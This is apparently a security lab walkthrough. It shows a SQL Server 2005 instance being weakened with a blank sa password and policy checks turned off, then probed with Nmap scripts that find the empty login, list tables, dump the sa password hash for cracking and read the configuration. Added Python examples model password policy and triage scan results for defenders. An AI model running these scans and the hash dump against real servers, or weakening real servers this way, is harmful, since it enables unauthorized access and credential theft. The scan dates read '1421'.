
1. Changes made to SQLEXPRESS so we could make this lab work.

WinXP with Microsoft SQL Server 2005 RTM

Regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQLServer\
DWORD LoginMode: right-click, Modify, set Value data to 2 (mixed-mode authentication, so SQL logins such as sa are accepted)

C:\Documents and Settings\test>osql -E -S .\SQLEXPRESS
1> ALTER LOGIN sa enable;
2> go
1> ALTER LOGIN sa WITH PASSWORD=''
2> go
Msg 15118, Level 16, State 1, Server TP-A123456789BCD\SQLEXPRESS, Line 1
Password validation failed. The password does not meet Windows policy
requirements because it is not complex enough.
1> ALTER LOGIN sa WITH PASSWORD='', CHECK_POLICY=OFF
2> go
1>

------------------------------------------------------------

2. Testing that the account works

C:\Documents and Settings\test>osql -S .\SQLEXPRESS -U sa (press enter)
Password: (press enter)
1>
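The "Password validation failed" error (Msg 15118) in step 1 comes from the Windows password-complexity policy that SQL Server applies to SQL logins while CHECK_POLICY is on; step 1 switches that check off to get an empty sa password through. The Python below is an added example, not part of the original post, that models that policy so the rejection can be reproduced offline. The rule set (at least six characters, three of the four character classes, and no embedded account name of three or more characters) is the standard Windows complexity rule; the function names are my own.

```python
import re

# Character classes the Windows complexity rule counts; at least three must be present.
CLASSES = {
    "uppercase": re.compile(r"[A-Z]"),
    "lowercase": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "symbol": re.compile(r"[^A-Za-z0-9]"),
}
MIN_LENGTH = 6  # the complexity rule's own floor; a separate minimum-length policy is usually stricter


def complexity_failures(password: str, account_name: str = "") -> list[str]:
    """Return the reasons a password fails the modelled policy (empty list means it passes)."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    present = [name for name, rx in CLASSES.items() if rx.search(password)]
    if len(present) < 3:
        reasons.append(f"only {len(present)} of 4 character classes present ({', '.join(present) or 'none'})")
    # Windows skips the account-name test for names shorter than three characters,
    # which is why a login called 'sa' never trips this part of the rule.
    if len(account_name) >= 3 and account_name.lower() in password.lower():
        reasons.append(f"contains the account name '{account_name}'")
    return reasons


def meets_policy(password: str, account_name: str = "") -> bool:
    return not complexity_failures(password, account_name)


if __name__ == "__main__":
    # The blank password from step 1: fails on length and on character classes.
    for candidate in ["", "password", "Tr0ub4dor&3"]:
        print(repr(candidate), "->", complexity_failures(candidate, "sa") or "passes")
```

On a live instance the audit is the reverse of step 1: leave CHECK_POLICY on and look in sys.sql_logins for rows with is_policy_checked = 0, which is exactly the state the lab creates for sa.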

------------------------------------------------------------

3. Now that SQL Server has been made vulnerable, use Nmap to test for MSSQL info.

Backtrack 5 R1

root@bt:~# nmap -p 445 --script ms-sql-info IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 14:59 BST
Nmap scan report for IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-info:
| Windows server name: TP-A123456789BCD
| [IP-Address\SQLEXPRESS]
| Instance name: SQLEXPRESS
| Version: Microsoft SQL Server 2005 RTM
| Version number: 9.00.1399.00
| Product: Microsoft SQL Server 2005
| Service pack level: RTM
| Post-SP patches applied: No
| TCP port: 1433
|_ Clustered: No

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

------------------------------------------------------------

4. Nmap test for the MSSQL login sa with a blank password (the default account) on port 1433

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-empty-password --script-args mssql.instance-all IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 14:59 BST
Nmap scan report for IP-Address
Host is up (0.00066s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-empty-password:
| [IP-Address\SQLEXPRESS]
|_ sa: => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

------------------------------------------------------------

5. Nmap test for the MSSQL login sa with a blank password (the default account) on port 445

Backtrack 5 R1

root@bt:~# nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:00 BST
Nmap scan report for IP-Address
Host is up (0.00061s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Host script results:
| ms-sql-empty-password:
| [IP-Address\SQLEXPRESS]
|_ sa: => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

------------------------------------------------------------

6. Nmap queries Microsoft SQL Server (ms-sql) for a list of tables per database.

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:23 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
| [IP-Address:1433]
| FoundStone_Bank
| table column type length
| ===== ====== ==== ======
| fsb_accounts account_no numeric 9
| fsb_accounts account_type varchar 50
| fsb_accounts balance_amount numeric 13
| fsb_accounts branch varchar 200
| fsb_accounts creation_date datetime 8
| fsb_accounts currency varchar 5
| fsb_accounts user_id numeric 9
| fsb_users creation_date datetime 8
| fsb_users login_id varchar 20
| fsb_users password varchar 20
| fsb_users user_id numeric 9
| fsb_users user_name varchar 200
|
| Restrictions
| Output restricted to 2 tables (see ms-sql-tables.maxtables)
| Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_ No filter (see ms-sql-tables.keywords)
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

------------------------------------------------------------

7. Nmap queries Microsoft SQL Server (ms-sql) instances for a list of databases a user has access to.

Backtrack 5 R1

root@bt:~# nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:49 BST
Nmap scan report for IP-Address
Host is up (0.00051s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-hasdbaccess:
| [IP-Address:1433]
| sa (Showing 5 first results)
| dbname owner
| ====== =====
|_ FoundStone_Bank TP-A123456789BCD\test
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

------------------------------------------------------------

8. Nmap dumps the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John the Ripper. To do so, the user needs the appropriate DB privileges.

Backtrack 5 R1

root@bt:~# nmap -p 1433 IP-Address --script ms-sql-dump-hashes --script-args mssql.username=sa,ms-sql-empty-password

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:52 BST
Nmap scan report for IP-Address
Host is up (0.00040s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [IP-Address:1433]
|_ sa:0x01004086CEB608F48FAECCE50524FAB7AEF778643C96B8F83E03
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

------------------------------------------------------------

9. Nmap queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings.

root@bt:~# nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,ms-sql-empty-password IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1421-01-07 15:56 BST
Nmap scan report for IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-config:
| [IP-Address:1433]
| Databases
| name db_size owner
| ==== ======= =====
| FoundStone_Bank 2.73 MB TP-A123456789BCD\test
| Configuration
| name value inuse description
| ==== ===== ===== ===========
| SQL Mail XPs 0 0 Enable or disable SQL Mail XPs
| Database Mail XPs 0 0 Enable or disable Database Mail XPs
| SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs
| Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures
| Web Assistant Procedures 0 0 Enable or disable Web Assistant Procedures
| xp_cmdshell 0 0 Enable or disable command shell
| Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries
|_ Replication XPs 0 0 Enable or disable Replication XPs
MAC Address: 01:02:03:aA:bB:cC (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
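Steps 3 to 9 each produce a block of NSE script output that a defender has to read and prioritise. The Python below is an added example, not from the original post, that turns the plain-text output of ms-sql-info, ms-sql-empty-password and ms-sql-config into a sorted list of findings: an RTM build with no patches, a login that accepts an empty password, and any risky server option that is in use. The embedded scan text is constructed to mirror the lab output above (it is not a real capture, and "Ole Automation Procedures" was set to 1 so that one risky option is actually flagged); the parser, severities and function names are my own choices.

```python
"""Added example: triage ms-sql-* NSE output into defender findings."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample modelled on the lab output above; not a real capture.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| ms-sql-info:
| [IP-Address\\SQLEXPRESS]
| Version: Microsoft SQL Server 2005 RTM
| Version number: 9.00.1399.00
| Product: Microsoft SQL Server 2005
| Service pack level: RTM
|_ Post-SP patches applied: No
| ms-sql-empty-password:
| [IP-Address\\SQLEXPRESS]
|_ sa: => Login Success
| ms-sql-config:
| [IP-Address:1433]
| Configuration
| name value inuse description
| ==== ===== ===== ===========
| xp_cmdshell 0 0 Enable or disable command shell
| Ole Automation Procedures 1 1 Enable or disable Ole Automation Procedures
|_ Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries
"""

# Server options that let a SQL login reach the operating system or other servers.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

SECTION_RE = re.compile(r"^\|_?\s*(ms-sql-[\w-]+):\s*$")
CONFIG_ROW_RE = re.compile(r"^(?P<name>.+?)\s+(?P<value>[01])\s+(?P<inuse>[01])\s+(?P<desc>.*)$")
EMPTY_PW_RE = re.compile(r"^(?P<login>\S+):\s*=>\s*Login Success$")
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


@dataclass
class Finding:
    severity: str  # critical / high / medium
    script: str    # NSE script whose output is the evidence
    message: str


def split_sections(text: str) -> dict[str, list[str]]:
    """Group the '|'-prefixed lines under the NSE script that printed them."""
    sections: dict[str, list[str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue  # banner, PORT table, MAC address, 'Nmap done' and so on
        header = SECTION_RE.match(raw)
        if header:
            current = header.group(1)
            sections[current] = []
        elif current is not None:
            sections[current].append(raw.lstrip("|_ ").rstrip())
    return sections


def check_info(lines: list[str]) -> list[Finding]:
    fields = {}
    for line in lines:
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    findings = []
    if fields.get("Service pack level") == "RTM":
        findings.append(Finding("high", "ms-sql-info",
                                f"{fields.get('Product', 'SQL Server')} is at RTM level, no service pack installed"))
    if fields.get("Post-SP patches applied", "").lower() == "no":
        findings.append(Finding("medium", "ms-sql-info", "no post-service-pack patches applied"))
    return findings


def check_empty_password(lines: list[str]) -> list[Finding]:
    return [Finding("critical", "ms-sql-empty-password",
                    f"login '{m.group('login')}' authenticates with an empty password")
            for m in map(EMPTY_PW_RE.match, lines) if m]


def check_config(lines: list[str]) -> list[Finding]:
    findings = []
    for m in filter(None, map(CONFIG_ROW_RE.match, lines)):
        if m.group("name") in RISKY_OPTIONS and m.group("inuse") == "1":
            findings.append(Finding("high", "ms-sql-config", f"'{m.group('name')}' is enabled and in use"))
    return findings


CHECKS = {"ms-sql-info": check_info,
          "ms-sql-empty-password": check_empty_password,
          "ms-sql-config": check_config}


def triage(text: str) -> list[Finding]:
    """Run every known check over the scan text; most severe findings first."""
    findings = []
    for script, lines in split_sections(text).items():
        if script in CHECKS:
            findings.extend(CHECKS[script](lines))
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f.severity])


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity.upper():8}] {f.script}: {f.message}")
```

Feed it the saved output of a scan such as the ones above (nmap -oN file) and the empty-password hit comes out on top, followed by the unpatched RTM build and any enabled risky option; the "SMO and DMO XPs" row from step 9 is deliberately not in RISKY_OPTIONS because it is on by default and is not itself a route to the operating system.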

------------------------------------------------------------

http://www.myexploit.wordpress.com/information-gathering-nmap/
